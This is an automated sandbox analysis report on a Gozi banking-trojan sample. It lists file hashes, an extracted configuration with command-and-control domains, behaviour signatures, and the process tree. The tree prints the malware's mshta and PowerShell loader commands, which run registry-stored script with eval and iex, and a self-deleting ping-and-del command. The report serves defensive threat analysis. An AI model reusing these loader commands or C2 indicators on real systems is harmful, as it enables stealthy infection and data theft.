Analysis
-
max time kernel
151s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
07-10-2023 08:08
Static task
static1
Behavioral task
behavioral1
Sample
911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4.exe
Resource
win7-20230831-en
General
-
Target
911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4.exe
-
Size
274KB
-
MD5
d18f3fecf6d28ddd0f4cf4a9b53c0aec
-
SHA1
05263b9ec69fcf48cc71443ba23545fabe21df12
-
SHA256
911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4
-
SHA512
4629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512
-
SSDEEP
3072:utyJSwPI9F4BwVVO+kjH4wjyIphvo3ZDivScpBaa4l8QU:iyrPa4BI7wuIphg3ZDi6cnA8Q
Malware Config
Extracted
gozi
Extracted
gozi
5050
mifrutty.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
http://igrovdow.com
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 4316 set thread context of 3244 4316 powershell.exe Explorer.EXE PID 3244 set thread context of 3788 3244 Explorer.EXE RuntimeBroker.exe PID 3244 set thread context of 4076 3244 Explorer.EXE RuntimeBroker.exe PID 3244 set thread context of 4864 3244 Explorer.EXE RuntimeBroker.exe PID 3244 set thread context of 2460 3244 Explorer.EXE RuntimeBroker.exe PID 3244 set thread context of 4896 3244 Explorer.EXE cmd.exe PID 3244 set thread context of 1412 3244 Explorer.EXE cmd.exe PID 4896 set thread context of 3284 4896 cmd.exe PING.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2032 4580 WerFault.exe 911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 3284 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4.exepowershell.exeExplorer.EXEpid process 4580 911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4.exe 4580 911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3244 Explorer.EXE -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 4316 powershell.exe 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 3244 Explorer.EXE 4896 cmd.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
Processes:
powershell.exeExplorer.EXERuntimeBroker.exedescription pid process Token: SeDebugPrivilege 4316 powershell.exe Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeShutdownPrivilege 3788 RuntimeBroker.exe Token: SeShutdownPrivilege 3788 RuntimeBroker.exe Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE Token: SeShutdownPrivilege 3244 Explorer.EXE Token: SeCreatePagefilePrivilege 3244 Explorer.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
Explorer.EXEpid process 3244 Explorer.EXE 3244 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 3244 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3244 Explorer.EXE -
Suspicious use of WriteProcessMemory 46 IoCs
Processes:
mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exedescription pid process target process PID 3688 wrote to memory of 4316 3688 mshta.exe powershell.exe PID 3688 wrote to memory of 4316 3688 mshta.exe powershell.exe PID 4316 wrote to memory of 5064 4316 powershell.exe csc.exe PID 4316 wrote to memory of 5064 4316 powershell.exe csc.exe PID 5064 wrote to memory of 1980 5064 csc.exe cvtres.exe PID 5064 wrote to memory of 1980 5064 csc.exe cvtres.exe PID 4316 wrote to memory of 2240 4316 powershell.exe csc.exe PID 4316 wrote to memory of 2240 4316 powershell.exe csc.exe PID 2240 wrote to memory of 960 2240 csc.exe cvtres.exe PID 2240 wrote to memory of 960 2240 csc.exe cvtres.exe PID 4316 wrote to memory of 3244 4316 powershell.exe Explorer.EXE PID 4316 wrote to memory of 3244 4316 powershell.exe Explorer.EXE PID 4316 wrote to memory of 3244 4316 powershell.exe Explorer.EXE PID 4316 wrote to memory of 3244 4316 powershell.exe Explorer.EXE PID 3244 wrote to memory of 3788 3244 Explorer.EXE RuntimeBroker.exe PID 3244 wrote to memory of 3788 3244 Explorer.EXE RuntimeBroker.exe PID 3244 wrote to memory of 3788 3244 Explorer.EXE RuntimeBroker.exe PID 3244 wrote to memory of 3788 3244 Explorer.EXE RuntimeBroker.exe PID 3244 wrote to memory of 4076 3244 Explorer.EXE RuntimeBroker.exe PID 3244 wrote to memory of 4076 3244 Explorer.EXE RuntimeBroker.exe PID 3244 wrote to memory of 4896 3244 Explorer.EXE cmd.exe PID 3244 wrote to memory of 4896 3244 Explorer.EXE cmd.exe PID 3244 wrote to memory of 4896 3244 Explorer.EXE cmd.exe PID 3244 wrote to memory of 4076 3244 Explorer.EXE RuntimeBroker.exe PID 3244 wrote to memory of 4076 3244 Explorer.EXE RuntimeBroker.exe PID 3244 wrote to memory of 4864 3244 Explorer.EXE RuntimeBroker.exe PID 3244 wrote to memory of 4864 3244 Explorer.EXE RuntimeBroker.exe PID 3244 wrote to memory of 4864 3244 Explorer.EXE RuntimeBroker.exe PID 3244 wrote to memory of 4864 3244 Explorer.EXE RuntimeBroker.exe PID 3244 wrote to memory of 2460 3244 Explorer.EXE RuntimeBroker.exe PID 3244 wrote to memory of 2460 3244 Explorer.EXE RuntimeBroker.exe PID 3244 wrote to memory of 2460 3244 Explorer.EXE RuntimeBroker.exe PID 3244 wrote to memory of 2460 3244 Explorer.EXE RuntimeBroker.exe PID 3244 wrote to memory of 4896 3244 Explorer.EXE cmd.exe PID 3244 wrote to memory of 4896 3244 Explorer.EXE cmd.exe PID 3244 wrote to memory of 1412 3244 Explorer.EXE cmd.exe PID 3244 wrote to memory of 1412 3244 Explorer.EXE cmd.exe PID 3244 wrote to memory of 1412 3244 Explorer.EXE cmd.exe PID 3244 wrote to memory of 1412 3244 Explorer.EXE cmd.exe PID 4896 wrote to memory of 3284 4896 cmd.exe PING.EXE PID 4896 wrote to memory of 3284 4896 cmd.exe PING.EXE PID 4896 wrote to memory of 3284 4896 cmd.exe PING.EXE PID 3244 wrote to memory of 1412 3244 Explorer.EXE cmd.exe PID 3244 wrote to memory of 1412 3244 Explorer.EXE cmd.exe PID 4896 wrote to memory of 3284 4896 cmd.exe PING.EXE PID 4896 wrote to memory of 3284 4896 cmd.exe PING.EXE
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4864
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4076
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3788
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Users\Admin\AppData\Local\Temp\911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4.exe"C:\Users\Admin\AppData\Local\Temp\911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4580 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 7363⤵
- Program crash
PID:2032 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mlk8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mlk8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\47C55FEA-FA41-11E9-3C6B-CED530CFE2D9\\\ActiveStart'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3688 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jdjdma -value gp; new-alias -name wulegndcrk -value iex; wulegndcrk ([System.Text.Encoding]::ASCII.GetString((jdjdma "HKCU:Software\AppDataLow\Software\Microsoft\47C55FEA-FA41-11E9-3C6B-CED530CFE2D9").ClassFile))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4316 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uvmbtidb\uvmbtidb.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE2BF.tmp" "c:\Users\Admin\AppData\Local\Temp\uvmbtidb\CSC4A98549D24DA45349D8FB47AF371A2D.TMP"5⤵PID:1980
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\24ru0f3u\24ru0f3u.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE36B.tmp" "c:\Users\Admin\AppData\Local\Temp\24ru0f3u\CSC577941724EDF4BCEB33F89DB8C9451.TMP"5⤵PID:960
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3284 -
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:1412
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2460
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4580 -ip 45801⤵PID:2944
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD57a3b3868eb4b4645ef6b8f5b9a7759ec
SHA1d043bebe8c83058a98965187f12e732cce56cf00
SHA256332ee8e61196191bc21e651535e2b60c80aa91ee61c26682e681fa5746fb42ef
SHA5124b4918fbd5518c74b38939a10e31138ea394f02c57c921ef55c60b1cfc2b23a6df44178c901ba1a995e6fc7de50e839e0c26d1e6c9f7e44bda8c54d590f1e69f
-
Filesize
1KB
MD52ff292c923cf33f4c7c135d0361191e1
SHA19dd8f13d968bda54835766f2900a34a8f04a608a
SHA2569251b375fae6964075a2651faed35d376b5456cc80d0229170873e0ff6f3ad5d
SHA5129856e83d5a8fde09fcb3f6eac9d12b1c980ca40700367356fe700a6522f3b0dd49ab32e47b55708ec2b164a8dcb3ffa696f3c8280767bf5286f8d6c54c2724d4
-
Filesize
1KB
MD598832eb7c23c7a326d946027319e5c6f
SHA1f18652092f2283bfc1137eff7baaeff0373d759a
SHA2569eb4b8608f8c7a1a1deb6d5976ae044139804658745cd5627de266e6b368249f
SHA512c7efe454aa7f7aa4d19007d45f07d10ca785f09af77486cafe2f69c6ec27672df611cda8cb1f13261348dab253b3425fe84be11d626b111fdfc69b7a256cbfef
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD57bbabb66d5fb9d39f2bdc0460365056a
SHA11edba1afb1c99b2367be0cab2972fc7d6e47e9a1
SHA256d774951d12ec9394b84fdeb6e5dd46c064b9ef02e23ecaf26557ac7c1e958898
SHA512957147be9922126944a11bb1ef10bb8ebee8e73a247e7afc176ee6406c20bbf9dc05e29ea8f64e254bb14c006351679c5904cc70fb53ab6880ebbeb79bc21a7a
-
Filesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
Filesize
369B
MD5f462c8110e6b99981f72bddda4911544
SHA1ac6de29cec4b22eba05115c6aec8cba49d2d21b3
SHA25659b4f87c0b99aaaa90ef2761d69f8cbcb7ed1a2240848e7dad6b38e16be950ca
SHA5124716601907b39734a673476bee4e0a2c43fb8e0313cbf64ec26c549973839303c838af505fc48c2443b47a8160029b473045af8a11868d7d049aafa2177cc352
-
Filesize
652B
MD5dc2441a68a81ead685dc1bd952725061
SHA19a2028bbbcf475e76df3cb63d03d6364ef76e97d
SHA256b355758b1790594fb769d454b3cb87b90c31037c982f76aa82cfecbd07c5f024
SHA51238f34b416a16d31e454d2a00f2840d1f59729c7ae446e09fb56b3dcd9bda5ded935d62cbdd18040811d2263167c6613b7d3b4b4c830bf5aa4ec24fde61d0958a
-
Filesize
652B
MD5b3c9d5a5f089c5ceac802afa816d5f03
SHA1e9cf1190c0faf8f7b3279519f82b7cbb32ec1c02
SHA25658de0bc8402483d6066e685e47e9262e2b7b61f87328506b5fae8d8ba6eaf7a0
SHA5127288e1726413250c9eadd9474134e641465e12dab5fc2ea765f0419430db6b6e7b3a6a5cf2dd8411ac6ed412ac59008182eff8d54dfa069978317f4d7e5d0415
-
Filesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
Filesize
369B
MD5a65a1b2f6329f2dad8860f9f18bfefef
SHA1f77cc47e8db28148927afe505ccc00a014bc282b
SHA256eb751d048bb3790158c363e4da892cd3f134a147eb098cefa9c5f5da4c64633f
SHA512e5bf651f799f76ea05a4f81ea4ba884e1774bfafb9f8be57c7ff5602b6b97311db3157f9923ef9b65f166c248b517361e42f7662935ed728bcd31fa6f285cb83